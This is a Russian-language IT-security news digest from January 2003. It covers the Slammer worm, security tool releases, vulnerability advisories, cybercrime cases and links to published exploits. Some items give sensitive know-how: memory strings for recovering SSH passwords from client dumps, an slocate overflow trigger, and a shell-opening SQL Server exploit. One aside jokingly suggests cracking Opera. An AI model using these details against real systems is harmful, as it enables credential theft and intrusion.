Dave Aitel из Immunity, Inc. сообщает о выходе новой версии SPIKE Proxy - инструмента, предназначенного для тестирования Web-приложений. В новой версии улучшен механизм совместимости с броузером IE, включён механизм блокирования проверок заданных хостов и Вэб-страниц, включены дополнительные проверки на уязвимости внедрения SQL (SQL Injection). В анонсе также указывается, что в феврале ожидается выход новой версии (2.8) SPIKE - инструмента для исследования сетевых протоколов и реверс-инжениринга. Презентация новой версии состоится в рамках конференции Black Hat в Cиэтле. Подробности - http://www.immunitysec.com/spikeproxy_downloads.html
31/01/2003 09:27 Студента Бауманки отчислили за высказывания в форуме от лица ректора.
В общежитии одного из факультетов Бауманки из-за нелестного высказывания одного из студентов на форуме от имени ректора на несколько дней был отключен внешний Интернет. Содержание объявления, якобы от имени ректора, которое все-таки попало в интернет, выглядит примерно так: "Я купил дочери пежо-206, и себе чуть-чуть бабла оставил, а на Вас, мужики, и на ваш ремонт, извините, не хватило". Таким шутливым образом студент, IP-адрес которого тут же определили сотрудники МГТУ, решил обратить внимание интернет-пользователей к творящемуся, по мнению студентов, беспределу среди руководства вуза, приведшему, как они считают, к разворовыванию огромной суммы денег, выделенной на ремонт общежития N10. Однако руководство вуза шутки не поняло и студента отчислило. Как считаю сами студенты, данная мера слишком жестка и, вероятно, будет оспорена в судебном порядке. Источник - http://www.internet.ru
31/01/2003 09:17 Британская полиция провела первый рейд против нарушителей запрета перепрошивки мобильников.
Полиция британского региона Мидлендс (Midlands) провела первый рейд против нарушителей закона 2002 года о запрете перепрограммирования заводских номеров мобильников (IMEI). По оперативным данным, поступившим от двух информаторов, перепрошивка проводилась в одном из магазинов сотовой связи в районе Элюм Рок города Бирмингем (Alum Rock, Birmingham). В ходе рейда из магазина были изъяты компьютер, программное обеспечение и другое оборудование. "Закон о перепрограммировании мобильных телефонов" (Mobile Telephone [Re-programming] Act 2002) вводит уголовную ответственность до 5 лет тюремного заключения и штраф за перепрограммирование номера IMEI, а также за продажу и предоставление оборудования для этого. Инспектор Дэйв Уокер (Dave Walker) сказал, что цель закона - предотвратить использование ворованных телефонов. Операторы Orange и T-Mobile установили в своих сетях дорогостоящее оборудование, которое может блокировать подключение к сети телефона с IMEI, занесенным в "черный список". Кража мобильных телефонов - одно из самых популярных уличных преступлений в Великобритании. По данным полиции, 28% нападений на прохожих происходит с целью кражи мобильника. Источник - http://www.cnews.ru
30/01/2003 16:06 В Windows Server 2003 можно будет блокировать IE.
Корпорация Microsoft, активно пропагандирующая свою политику усиления безопасности программного обеспечения, объявила о том, что в операционной системе Windows Server 2003 можно будет блокировать Internet Explorer, а поддержка звука по умолчанию и вовсе будет выключена. Информация об этом появилась на сайте Microsoft Watch. Дело в том, что до последнего времени софтверный гигант поставлял свои серверные операционные системы с большим количеством фактически ненужных приложений – например, медиапроигрывателем, браузером Internet Explorer и так далее. Все это снижало безопасность и вызывало излишнюю критику со стороны противников Microsoft. Теперь же руководство софтверной компании решило пойти по другому пути: в частности, в Windows Server 2003 звук по умолчанию будет выключен, а для зон интранета и интернета будет установлен высокий уровень безопасности. Это означает полный запрет ActiveX, отключение виртуальной машины Java и так далее. Для доверительных узлов можно определить средний уровень безопасности. О новости стало известно от Max-а c slashzone.ru. Подробности о Win2003 - http://www.microsoft.com/presspass/...
30/01/2003 15:29 Создание CD-ROM для экстренного восстановления системы после краха.
На сайте opennet.ru приводится ссылка на довольно полезную статью. В статье "How to make a System Restore CD-ROM" описывается процесс создания CD диска на базе пакета mkCDrec, для восстановления Linux систем после сбоя. Ссылка - http://www.opennet.ru/opennews/art.shtml?num=2045
30/01/2003 14:28 В ФАПСИ сумели укротить Helkern.
Во всем мире до сих пор считают убытки от деятельности вируса Helkern на прошлых выходных. В России последствия червячной эпидемии были не так страшны. В частности, в Доме Правительства вирусную атаку не ощутили. Департамент правительственной информации поспешил заверить общественность в том, что ни один из компьютеров, расположенных в Доме правительства Российской Федерации, не пострадал в результате эпидемии Helkern. Напомним, что защитой высокопоставленных интернет-пользователей опекается Федеральное агентство правительственной связи и информации при Президенте России (ФАПСИ). Большинство компьютеров в Доме правительства не выходит напрямую в Интернет, а находится во внутренней сети. Но и те компьютеры, которые были под угрозой эпидемии и находились в зоне риска, никак не пострадали. Источник - http://www.runet.ru/news/2283.html
30/01/2003 14:01 Panda Antivirus Appliance защищает от червей типа SQLSlammer.
Компания Panda Software объявила о том, что ее корпоративный антивирусный продукт Panda Antivirus Appliance обнаруживает и блокирует червей типа SQLSlammer. Panda Antivirus Appliance - это программно-аппаратный антивирус, предназначенный для защиты HTTP-, SMTP- и FTP-трафика предприятий, которые не хотят дополнительно нагружать работающие у них почтовые серверы и межсетевые экраны. Panda Antivirus Appliance не зависит от платформы сервера и не требует никакой дополнительной настройки серверов, поскольку пропускает весь трафик через себя и одновременно проверяет его. Panda Antivirus Appliance проводит проверку на уровне протокола TCP/IP и блокирует пакеты данных, пытающиеся воспользоваться слабыми местами в системе защиты SQL Server. Точнее, программа блокирует попытки вызвать переполнение буфера и отказ в обслуживании (denial of service), подробно описываемые в Microsoft Security Bulletin. Источник - http://www.viruslab.ru/appliance
30/01/2003 13:39 Эксплоит для Outlook Express.
Одним из членов группы Beyond Security Ltd.'s SecurITeam опубликован эксплоит уязвимости, обнаруженной в Outlook Express (версии 5.0-6.0), позволяющей удалённо выполнить произвольный код на машине жертвы при попытке просмотра сообщения (из-за специально сформированного поля From:). Эксплоит на писан на Perl. Эксплоит - http://www.securiteam.com/exploits/5GP0O2K8UO.html
30/01/2003 13:10 Cтатья "Установка honeypot на примере OpenSource Honeyd".
На сайте securitylab.ru появился очередной качественный перевод, выполненный Михаилом Разумовым. Как следует из названия, статья посвящена установке honeypot - сервера, предназначенного для изучения методов и технологий, применяемых хакерами при взломе систем. Рассмотрена технология создания honeypot-сервера на основе Honeyd - OpenSource решения, разработанного и поддерживаемого Niels Provos. Honeyd разработан для использования в Unix-овых операционных системах, таких как OpenBSD или Linux, однако вскоре будет адаптирован и к Windows. Статья - http://www.SecurityLab.ru/?ID=35686
30/01/2003 12:29 Департамент Защиты Отечества США перешёл с Win2K на Linux.
Как сообщает NewsForge, в конце прошлой недели Департамент Защиты Отечества (Department of Homeland Security (www.dhs.gov)) США осуществил перевод своих серверов на Oracle под управлением ОС Linux. До этого все сервера этого недавно созданного правительственного департамента работали под управлением ОС Windows 2000. Cами специалисты департамента отказались комментировать эти изменения, однако, как утверждают эксперты, это было связано с появлением на прошлой неделе червя Slammer и невозможностью быстро обновить ПО серверов. В частности, так утверждает Jerry Brady из компании CTO of Guardent, оказывающей консультационные услуги в части компьютерной безопасности федеральным правительственным учреждениям. Подробности - http://newsforge.com/newsforge/03/01/27/1831240.shtml?tid=2
30/01/2003 12:08 Уязвимость во многих SSH2-клиентах.
Компания iDEFENSE, крупнейший исследователь программных продуктов в области компьютерной безопасности, обнаружила уязвимости во многих клиентах, предназначенных для обеспечения связи с SSH2-серверами. Называются следующие продукты: AbsoluteTelnet, SecureCRT, Entunnel, SecureFx, и PuTTY. Уязвимость связана с некорректной очисткой памяти после проведения сеанса авторизации этими клиентами. Таким образом, пользователь, имеющий доступ к памяти, либо способный получить дамп памяти, может получить доступ к важной аутентификационной информации (имя пользователя и пароль к SSH-серверу). Обнаружить эту информацию довольно просто - обычным поиском строки в памяти. Для PuTTY - строка "password:", для SecureCRT - "ssh-connection", для AbsoluteTelnet - "Password" (в сегменте памяти чтения/записи). Во всех случаях информация хранится в незашрованном виде. Производители всех клиентов либо уже выпустили обновлённые версии, либо выпустят в ближайшее время. Подробности - http://www.idefense.com/advisory/01.28.03.txt
30/01/2003 11:02 Анонсы от Black Hat.
Jeff Moss, руководитель проекта Black Hat опубликовал несколько важных новостей в BUGTRAQ. Было заявлено, что конференция, организуемая Black Hat, "Windows Security Briefings & Training 2003" состоится в Сиэтле 24-27 февраля. Ожидается представление нового инструмента под названием "Enforcer", написанным Tim Mullen, Michael Howard и David LeBlanc выступят с технологией написания безопасного кода для Windows-приложений, Saumil Shah представит обзор технологии, применяемой в тулките "Fire & Water". Также Greg Hoglund (основатель www.rootkit.com) и Cenzic в течении 2-х дней будут представлять в рамках программы треннинга технологию под названием "Аспекты наступательной Root-Kit технологии". BlackHat выложены видеоматериалы прошлогодних конференций Black Hat Windows Security 2002 и Black Hat USA 2002. Также Black Hat напоминает, что идёт процесс сбора материалов для предстоящей европейской конференции Black Hat, которая состоится в мае в Амстердаме. Анонс конференции - http://www.blackhat.com/html/win-usa-03/win-usa-03-index.html Программа тренинга - http://www.blackhat.com/html/win-usa-03/train-bh-win-03-index.html Видеоматериалы-2002 - http://www.blackhat.com/html/bh-multi-media-archives.html#USA-2002
30/01/2003 10:25 Скляров против НТВ - 1:0.
Известный российский программист Дмитрий Скляров выиграл суд у телекомпании "НТВ". Иск Склярова к телекомпании "НТВ" о защите чести, достоинства и деловой репутации рассматривался в Пресненском межмуниципальном суде Москвы. По решению суда, телекомпания обязана опровергнуть сведения, порочащие имя Склярова. Ложная информация прозвучала в выпуске новостей, вышедших в эфир 07.08.2001. В новостях речь шла об обыске в квартире Дмитрия Склярова, где, по информации НТВ, были обнаружены некие копии документов МВД. Кроме того, НТВ должна компенсировать моральный вред, причиненный программисту, в размере 15000 рублей. Самое интересное, что решение суда не устроило ни Склярова, ни НТВ, и, скорей всего, будет в ближайшее время обжаловано. Решение вступит в силу только после его проверки Мосгорсудом. Источник - http://www.lenta.ru
30/01/2003 10:03 Криптография RSA в PKZIP. Уже скоро.
PKWare Inc., сообщает, что приобрела лицензии на BSAFE от RSA Security Inc. и вскоре криптографические функции от RSA будут доступны не только в архиваторах для Windows, но и под другими операционными системами. Не очень, правда, понятно, на кого рассчитано это решение. Корпорации, серьезно подходящие к вопросу защиты данных, как правило используют специализированные решения, интегрирорванные в почтовые системы или системы электронного документооборота. Те же, у кого бюджет поменьше, используют свободно распространяемые (но опять-таки специализированные) продукты типа GNUPG. Источник новости - cybervlad с www.bugtraq.ru. Подробности - http://www.theregister.co.uk/content/55/29029.html
29/01/2003 20:38 Вышла окончательная версия браузера Opera 7.
Компания Opera Software выпустила окончательный вариант браузера Opera 7. В нем используется совершенно новый движок, позволивший увеличить и без того высокую скорость обработки веб-страниц. Причем скорость не идет в ущерб качеству отображения страниц: если верить создателям браузера, Opera 7, в отличие от своих предшественниц, полностью поддерживает практически все современные стандарты интернета. Важным нововведением стал и встроенный почтовый клиент M2, который, наконец, стал по-настоящему функциональным. Версия без встроенной поддержки Java занимает всего 3,2 Мб, а с поддержкой Java - 12,6 Мб. Как и раньше, Opera 7 распространяется в бесплатном и платном вариантах. После двух недель использования бесплатный вариант начинает показывать баннеры. Чтобы избавиться от них, нужно заплатить 39 долл. США (либо, применив крэк ;)). Подробное описание - http://www.compulenta.ru/2003/1/29/37152/
29/01/2003 19:20 Южная Корея подозревает китайских хакеров в создании вируса Slammer.
Южнокорейские власти напали на след возможных авторов вируса Slammer, в прошедшие выходные парализовавшего работу интернета в этой стране. Напомним, что атака Slammer произошла в субботу утром и вызвала серьезное замедление работы интернета во всем мире. Червь использовал дыру в СУБД Microsoft SQL Server, и в результате атаки многие использующие эту базу данных сайты попросту отказали. Сильнее всех от атаки пострадала именно Южная Корея, в которой интернетом пользуются 70% жителей. Правоохранительные органы многих стран взялись за расследование вирусной атаки, а южнокорейские спецслужбы уже напали на след возможных авторов вируса. Источником происхождения Slammer вполне может оказаться Китай. Во всяком случае, корейские следователи обнаружили в интернете сайт китайской хакерской группы, на котором сообщалось о разработке вируса, использующего дыру в MS SQL Server. И хотя китайский вирус несколько отличается от Slammer, последний вполне может оказаться одним из вариантов червя, работу над которым хакеры начали в октябре прошлого года. Южнокорейские власти проинформировали о своих результатах соответствующие органы США, Австралии и КНР. Дальнейшие шаги по расследованию самой разрушительной вирусной эпидемии будут вестись в тесном контакте с Интерполом. Источник - http://www.reuters.com/
29/01/2003 18:06 Удалённый UDP-эксплоит для MSSQL2000.
Переработанный эксплоит Дэвида Личфилда (управляющий директор известной фирмы Next Generation Security Software Ltd. из Лондона), эксплуатирующий уязвимость в MS SQL server 2000. Устранены несколько ошибок. Открывает оболочку на 53 порту. Кстати, сам Дэвид в интервью газете Washington Post выразил возмущение тем, что часть кода его эксплоита была использована червем для организации атаки на Инернет-хосты И сказал, что в дальнейшем он не будет предавать огласке подобные опасные эксплоиты. Эксплоит - http://www.securitylab.ru/?ID=35643
29/01/2003 14:04 Хакера из Сургута отправили в психушку.
Суд признал невиновным Сургутского хакера, который путем шантажа получил от одного из крупных американских банков $10000. Он признан невменяемым и отправлен на принудительное лечение в психиатрическую больницу. Об этом сообщил заместитель председателя Сургутского горсуда Виктор Тюменцев. В апреле 2002 года со своего домашнего компьютера сургутский хакер сумел взломать интернет-сервер компании Online Resources & Communications Corporation, которая находится в городе Маклин в США, и получить доступ к базе данных, в которой содержалась информация о клиентах. Полученные сведения (более полутора тысяч имен и фамилий клиентов банка, их номера счетов, суммы вкладов и прочие конфиденциальные данные) он разместил в Интернете и принялся шантажировать банк, требуя за своё молчание 10000 долларов. При участии ФБР банк вступил с вымогателем в переписку. Руководство банка приняло решение выделить запрошенную сумму. Когда выяснилось, что угрозы поступают из России, ФБР обратилось за помощью к Управлению "Р" в Москве. Но к моменту задержания взломщика выкуп банк уже заплатил. Более того, часть денег хакер успел потратить на новое оборудование. Кто именно проводил задержание, где и когда - не сообщается. Ущерб, нанесенный банку, превысил 250 тыс. долларов. Причастность жителя Сургута к преступлению была полностью доказана. Как сообщают представители следствия, квалификацию, достаточную для взлома компьютерной сети одного из крупнейших американских банков, студент из Сургута получил, изучая материалы одного из популярных российских веб-ресурсов для хакеров. Источник - http://www.newsru.com
29/01/2003 13:49 Не открывайте письма от американского президента.
В последнее время в сети стал распространяться новый спам, который был уже получен значительным числом пользователей. Новый спам представляет собой пародию на нигерийские письма или "аферу 419", когда мошенники просили помочь переправить из Нигерии за вознаграждение крупную сумму денег и соблазняли жертву пойти на небольшие расходы, которые якобы будут возмещены позднее при личной встрече для передачи комиссионных. На этот раз спам содержит просьбу "сына прежнего президента США Джорджа Герберта Уолкера Буша" открыть банковские счета и перевести деньги на депозит в Internal revenue service of America до 15 апреля, которые в США считается днем возвращения налогов (tax return day). Один американец уже выразил свою готовность открыть депозит на сумму 2,1 млн. долларов. Письмо содержит следующие строки: SON OF THE FORMER PRESIDENT OF THE UNITED STATES OF AMERICA GEORGE HERBERT WALKER BUSH", who solicits a transfer of funds which can be yours if you lodge a deposit via the "INTERNAL REVENUE SERVICE OF AMERICA" by "THE FIFTEENTH(15TH) OF APRIL. Источник - http://www.viruslist.ru
29/01/2003 13:35 Мобильники как приманка для вируса.
Эксперты говорят, что мобильные телефоны и карманные компьютеры становятся все более лакомой приманкой для авторов вирусов. Специалисты по компьютерной безопасности полагают, что к 2005 году клиенты по меньшей мере одной из крупных сетей мобильной связи пострадают от подобного вируса. К этому времени широкое распространение должны получить устройства третьего поколения мобильной связи, а карманные компьютеры - стать еще быстрее и мощнее, что позволит компьютерным вирусам распространяться в их среде с такой же легкостью, как это происходит сегодня среди обычных компьютерных сетей. Поэтому эксперты советуют компаниям мобильной связи уже сейчас задуматься над тем, как бороться с подобными явлениями в будущем. Более подробно - http://www.SecurityLab.ru/?ID=35616
29/01/2003 12:06 Выход WaveLock 1.0.
Marco Peretti из SecureWave анонсировал выпуск версии 1.0 инструмента под названием WaveLock. Назначение его - предотвращение автоматического подключения беспроводных сетевых адаптеров в ОС WinXP, Win2K. Дело в том, что эти ОС уже оснащены драйверами для многих WLAN-адаптеров, и при установке их в машину драйвера автоматически будут подгружены с задействованием подключённого адаптеры. Примечательным является тот факт, что для подключения подобных устройств нет необходимости в наличии прав администратора системы. Налицо явное упущение в безопасности. Для предотвращения подобных "фокусов" и преназначена WaveLock. WaveLock определяет попытку подключения беспроводных адаптеров и предотвращает автоматическую загрузку соответствующего драйвера. WaveLock - http://securewave.com/products/free_utilities/wavelock.html
29/01/2003 11:23 Новый инструмент - ike-scan.
Рой Хиллс из Рочестера , Великобритания, анонсировал выпуск им нового инструмента под названием ike-scan. Предназначен он для определения типа ПО, которое используется для IKE (Inetrnet Key Exchange - механизм обмена ключами при создании VPN с использованием протокола IPSec). IKE осуществляется посредством протокола UDP. Технология работы сканера описана в прилагающемся PDF-документе. Область применения - очевидна. :) Однако, стоит заметить, что, хотя автор и говорит об условиях распространения GPL, тем не менее, для скачивания требуется ввести свои данные. По этой причине один из возмущённых посетителей сайта Philipp Wuensche из Германии выложил версию сканера на своём сервере, ссылку на который мы и приводим. Описание - http://www.nta-monitor.com/ike-scan/whitepaper.pdf Сканер - https://berlin.ccc.de/~cryx/ike-scan-1.0.tar.gz
29/01/2003 11:06 Бюллетень по безопасности от CISCO.
Cisco Systems, Inc. выпущен бюллетень по безопасности, в котором костатируется факт наличия уязвимости в ПО CISCO, содержащем MS SQL Server 2000. В частности, уязвимости содержат следующие продукты: Cisco CallManager 3.3(x), Cisco Unity 3.x, 4.x, Cisco Intelligent Contact Management (ICM) 5.0, Cisco E-Mail Manager (CeM), Cisco Building Broadband Service Manager 5.0, 5.1. При описании уязвимости CISCO ссылается на бюллетени от Microsoft MS02-039, MS02-056 и MS02-061. Уязвимость может привести к возможности выполнения произвольного кода на сервере или DoS. Администраторам, у которых установлены указанные продукты настоятельно рекомендуют пропатчиться. Подробности - http://www.cisco.com/warp/public/707/cisco-sa-20030126-ms02-061.shtml
29/01/2003 10:03 Microsoft наконец-то заметила червь.
Фирма Microsoft наконец-то выпустила бюллетень по безопасности, в котором описывается существование и механизм распространения червя Slammer (он же Helkern, он же Sapphire). Также опубликован список продуктов, которые включают в себя Microsoft SQL Desktop Engine (MSDE) 2000, а значит, являются потенциально уязвимыми для нового червя. Бюллетень - http://www.microsoft.com/technet/security/virus/alerts/slammer.asp Список - http://www.microsoft.com/technet/security/MSDEapps.asp
29/01/2003 09:06 Новый инструмент от Symantec.
Фирма Symantec выпустил программку, которая определяет непатченные MS SQL-серверы. Называется fixSQLex.exe. Новая версия, 1.0.3, также определяет непатченные MSDE (Microsoft SQL Desktop Engine) - инсталляции. Ссылка - http://securityresponse.symantec.com/avcenter/venc/data/...
28/01/2003 22:02 Microsoft не прошла испытание «Тюрьмой».
Из внутренней переписки Microsoft стало известно, что собственная сеть софтверного гиганта не устояла против червя SQL Slammer, атаковавшего интернет в минувший уикенд. Это поставило под сомнение политику компании, сделавшей ставку на поправки для устранения пробелов в защите ПО. Сообщения e-mail, попавшие в CNET News.com, рисуют картину борьбы компании с массовым заражением червем SQL Slammer, наводнившим в субботу многие корпоративные сети непрерывными потоками данных, замедливших доступ в интернет и внутренний трафик. «Возможно, затронуты все приложения и сервисы, и в лучшем случае следует ожидать эпизодической потери производительности, — пишет директор по эксплуатации центра обработки данных Microsoft Information Technology Group Майк Карлсон (Mike Carlson) в письме, разосланном в 8:04 a.m. PST в субботу членам других эксплуатационных групп Microsoft. — Сеть сильно перегружена трафиком, что затрудняет сбор информации о степени поражения». Эти сообщения ставят Microsoft в неловкое положение: компания жалуется на заказчиков, которые не устанавливают поправки, в то время как события последнего уикенда показали ее собственную уязвимость. В данном случае она, похоже, сама не выполнила своей рекомендации об устранении уязвимости в SQL Server 2000. Более того, несмотря на продолжающийся уже год рейд по усилению безопасности своего ПО, софтверный гигант так и не смог защитить от интернет-атак собственные жизненно важные серверы. Источник - http://www.zdnet.ru/?ID=294937
28/01/2003 21:45 Ошибка в AOL дорого обошлась клиентам.
Компания America Online невольно выставила на всеобщее обозрение электронную переписку своих клиентов. Произошло это из-за досадной ошибки в новой системе международной аутентификации пользователей AOL. Эта ошибка позволяла войти в любой почтовый ящик через веб-интерфейс без использования пароля, введя только имя пользователя. Ситуация усугубляется тем, что злоумышленник, войдя в почтовый ящик, мог не только читать и отправлять электронную почту, но и получал доступ к персональным данным и настройкам пользователя, включая пароли, номера счетов и учетные записи интернет-пейджера AIM. Ошибка не затронула сотрудников AOL, поскольку для доступа к их учетным записям, кроме имени и пароля, необходимо вводить дополнительный код SecurID. Представители AOL Time Warner отказываются комментировать информацию о дыре. Сколько пользователей AOL пострадали от ошибки, также достоверно неизвестно, однако пострадать должны были, как минимум, сотни пользователей. Ликвидирована уязвимость была лишь в прошлую среду. Источник - http://www.internetwk.com
28/01/2003 21:35 Израильские ученые придумали чип для взлома 1024-битного шифра RSA.
Ученые, работающие в отделе информатики и прикладной математики Вайсмановского научного института (Израиль) разработали проект вычислительного устройства, способного с высокой скоростью раскладывать большие числа на простые множители. Как известно, именно принцип вычислительной трудности факторизации (разложения на множители) больших чисел положен в основу многих современных криптографических алгоритмов. До сих пор наиболее эффективным алгоритмом факторизации считался алгоритм NFS (number field sieve - сито числового поля). С его помощью в 1999 году был взломан алгоритм RSA c ключом длиной 512 бит. Процесс взлома занял много месяцев и потребовал огромных вычислительных ресурсов. Стойкости 1024-разрядного шифра RSA, по мнению большинства экспертов достаточно для надежной защиты информации в течение ближайших 15-20 лет. Однако Ади Шамир (один из соавторов алгоритма RSA) и Эран Тромер полагают, что это не так. Двое исследователей разработали новое вычислительное устройство, способное факторизовать числа в несколько раз быстрее всех предыдущих разработок такого рода. В результате, взлом стойких шифров значительно облегчается. До последнего времени наиболее совершенным устройством для быстрого разложения чисел на множители была оптоэлектронная система TWINKLE. Она состояла из подложки, разбитой на множество вычислительных ячеек, каждая из которых работала с собственной числовой последовательностью. TWINKLE последовательно перебирает различные области числового сита в соответствии с сигналами от тактового генератора. Поскольку в TWINKLE применяются оптические компоненты, полупроводниковой основой устройства служит дорогой арсенид галлия. Устройство TWIRL, разработанное Шамиром и Тромером, использует близкий к TWINKLE подход к реализации алгоритма разложения чисел на множители. Однако новое устройство может параллельно рассматривать тысячи участков числового сита, а схема устройства не содержит оптических элементов. По сути, TWIRL представляет собой специализированную сверхбольшую интегральную схему (СБИС), работающую на частоте 1 ГГц, выполненную по 0,13-микронной технологии. Пока исследователи разработали лишь схему TWIRL и не реализовали ее на практике, хотя предварительная оценка показывает, что с помощью TWIRL взлом шифров с ключами длиннее 512 бит становится возможным. Например, для вскрытия 1024-битного шифра понадобится специальный компьютер на основе TWIRL стоимостью около 10 млн. долл. США. Для взлома шифра такой машине понадобится около года. 512-битный шифр RSA TWIRL-компьютер стоимостью в 10000 долларов США вскроет менее чем за десять минут. Источник - http://www.compulenta.ru
28/01/2003 21:28 Новая версия PE Tools v1.4.356.2003
Это полнофункциональная утилита для работы с PE/PE+(64bit) файлами, позволяющая редактировать все поля PE заголовка. Скачать можно здесь: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
28/01/2003 11:03 Новая Zaraza в Интернет.
Обнаружен новый макровирус Zaraza. Вирус имеет единственный макрос zaraza, содержащий функции expo_, AutoOpen, AutoNew, AutoClose, FileSaveAs, FileSave, HelpAbout, FileTemplate, ToolsMacro, ViewVBCode, IR_, zavis_. При открытии файла создает в каталоге, куда установлен MS Office текстовый файл ~42.drv, в который записывает свой VB-код. В дальнейшем этот файл используется для заражения других документов Word. Вирус изменяет название открытого окна MS Word на "Mikro Word". Выключает опцию VirusProtection, заражение происходит при создании, открытии, закрытии и сохранении с другим именем документов Word. По 30-м и 31-м числам каждого месяца, а также 14 декабря запускает процедуру вызывающую "зависание" компьютера. Источник - http://www.kaspersky.ru
28/01/2003 10:19 В день всех влюбленных червь Cassidy года сотрет все файлы на дисках.
Обнаружен интернет-червь Cassidy, распространяющийся в "peer-to-peer" сетях Kazaa. Размножается червь путем создавания копий в общедоступных каталогах этой сети. Cassidy представляет собой приложение Windows (PE EXE) размером около 205K и написан на MS Visual C++. После инсталляции червь посылает своему "хозяину" на адрес "cassieworm@hotmail.com" письмо- нотифификацию, которое содержит данные о заражённом компьютере (IP, имя загестрированного юзверя, время инфицирования и т.д.). 14 февраля 2003 года в 7:20 (локальное время на компьютере) червь уничтожает все файлы на всех доступных дисках. Источник - http://www.viruslist.ru
27/01/2003 16:16 Новая версия Panda Antivirus.
Компания Panda Software объявила о начале продаж на российском рынке нового продукта Panda Antivirus Platinum 7.0. Этот пакет предназначен, прежде всего, для профессионалов в области информационных технологий и предприятий малого бизнеса. Программа имеет широкий спектр возможностей по выявлению и устранению вирусной угрозы. Программа осуществляет непрерывную проверку файлов и сообщений, участвующих в любой выполняемой на компьютере операции, что обеспечивает постоянную защиту входящей/исходящей электронной почты и файлов всех типов. Кроме того, предусмотрены проверки системы или ее отдельных элементов (жестких дисков, базы данных почтового клиента, памяти и т. д.) по требованию или по заранее оговоренному расписанию. В программе используется движок Ultra Fast, основанный на быстрых алгоритмах проверки. Система безопасности оформлена в виде своеобразного "вирусного госпиталя" и содержит набор функций и инструментов, обеспечивающих полное управление всеми файлами и элементами, которые антивирусная программа считает потенциально опасными. Эти файлы, в частности, могут находиться "на карантине", а при необходимости могут отправляться в вирусную лабораторию Panda Software для дальнейшего анализа. Panda Antivirus Platinum 7.0 тесно интегрируется с оболочкой Windows Explorer, а также с почтовыми клиентами Microsoft Outlook и Lotus Notes, проверяет и лечит файлы и данные, передаваемые с ПК на КПК. Сайт Panda Software - http://www.viruslab.ru/
27/01/2003 14:19 Некорректное удаление сообщений в Eudora.
Некто BludClot сообщает о некорректном удалении сообщений в популярном почтовом клиенте Eudora. При удалении сообщения из папки "Trash", как оказалось, оно на самом деле не удаляется, а почтовая программа просто выставляет флаг о том, что сообщение удалено, но при этом сообщение остаётся на диске и может быть просмотрено при открытии текстовым редактором файла Trash.mbx. Полное удаление сообщения происходит только при выполнении команды "Сompact mailfolders". Автор также замечает, что подобная особенность характерна не только для папки "Trash" - при удалении сообщения из папки "Inbox" оно оказывается в двух местах - с выставленным флагом в папке "Inbox" (при этом сообщение просто не показывается почтовой программой) и в папке "Trash". Дествительное удаление происходит только при сжатии (compact) папок. "Особенность" была обнаружена в Eudora 5.2.0.9. Источник - http://www.securityfocus.com
27/01/2003 12:22 Близится конец DALnet?
За последние несколько месяцев распределённые DoS (DDoS) атаки на одну из старейших IRC-сетей DALnet заставили многих администраторов серверов отказаться от использования части ресурсов в качестве IRC-серверов этой популярной IRC-сети. На одном из Вэб-серверов помещено объявление о том, что в результате продолжительных и широкомасштабных DDoS-атак на IRC-сервера, Web-сервера, почтовые и DNS-сервера сети DALnet, многие провайдеры, у которых хостятся сервера сети DALnet, потерпели значительные финансовые убытки, а также другие неудобства, связанные с сетевыми атаками. Поэтому многие провайдеры вынуждены отказаться в размещении IRС-серверов в своих сетях. Возможно, подобные сообщения предвещают конец сети DALnet, и, возможно самой идеи IRC. Напомним, что IRC (Internet Relay Chat) был разработан в 1988 Jarkko Oikarinen из Финляндии для организации возможности "живого" общения людей через сеть Internet. Различные темы дискуссий и интересов организованы посредством т.н. "каналов", к которым может одновременно подключиться большое количество людей из разных концов планеты. Работа IRC-сетей организована путём виртуального объедения различных IRC-серверов в единую сеть. Сеть DALnet является одной из старейших IRC-сетей, организованной в июне 1994 г. бывшими пользователями сети EFnet (Eris Free Network). Подробнее - http://www.internetnews.com/dev-news/article.php/1573551
27/01/2003 11:20 Ошибка в интернет-версии банковского клиента.
Как сообщается на сайте bugtraq.ru, в интернет-версии популярного Банк-клиента компании "Инист" была обнаружена ошибка, позволяющая третьему лицу несанкционированно исполнить HTML/JS код с целью хищения финансов (или ключа) на ПК работающего с ИБ клиента, или, наоборот, недобросовестному клиенту имитировать похищениe средств/ключа, с целью предъявления претензий к банку. Ошибка была устранена производителем в течении 2-х суток с момента извещения. Описание - http://www.bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=6&m=69010
27/01/2003 10:33 Выход Veritas Backup Exec 9.0
На прошлой неделе компания Veritas Software объявила о выпуске решения для резервного копирования для операционной системы Microsoft Windows Server 2003 (.NET) под названием Backup Exec 9.0. Новый продукт предназначен для быстро развивающихся малых и средних предприятий. Пакет Backup Exec 9.0 обеспечивает быструю установку средств резервного копирования на все серверные платформы Microsoft и содержит самые производительные инструменты для копирования баз Exchange. Новая версия пакета Veritas Backup Exec обеспечивает самое быстрое копирование и восстановление данных на почтовых серверах Exchange. Тестирование показало, что скорость копирования данных Exchange выросла на 88% по сравнению с предыдущей версией Backup Exec 8.6. К тому же, новая версия позволяет копировать и восстанавливать данные с любым уровнем детализации, вплоть до отдельных почтовых папок, сообщений или вложений. Девятая версия пакета впервые предоставляет веб-интерфейс контроля и администрирования, доступ к которому, при наличии необходимого уровня полномочий, можно получить с любого компьютера, подключенного к интернету. Источник - http://www.softline.ru
27/01/2003 10:14 Тестовая программа для проверки уязвимости CVS.
Joe Testa из Rapid 7, Inc. выпустил программу для проверки уязвимости в CVS, недавно описанную в наших новостях (т.н. double-free bug). Написана на Java. Автор проверял её работоспособность под ОС Linux. Программа - http://www.security.nnov.ru/search/CVSProber.tar.gz
27/01/2003 09:51 Уязвимость в slocate.
В соответствии с исследованиями, проведёнными членами группы USG, обнаружена возможность локального переполнения буфера при использовании утилиты slocate, обеспечивающей безопасное индексирование и быстрый просмотр файлов системы. Уязвимость обнаружена в дистрибутивах Red Hat Linux версий 7.2 и 7.3 с slocate-2.6-1, установленным из RPM. Для получения уязвимости необходимо запустить slocate с ключами -c и -r, использовав в качестве аргумента строку длиной 1024 байта. Автор, Kevin Lindsay, сообщил о выходе новой версии slocate-2.7. Новая версия - ftp://ftp.geekreview.com/slocate/src/slocate-2.7.tar.gz
27/01/2003 09:21 Уязвимость в SpamAssassin.
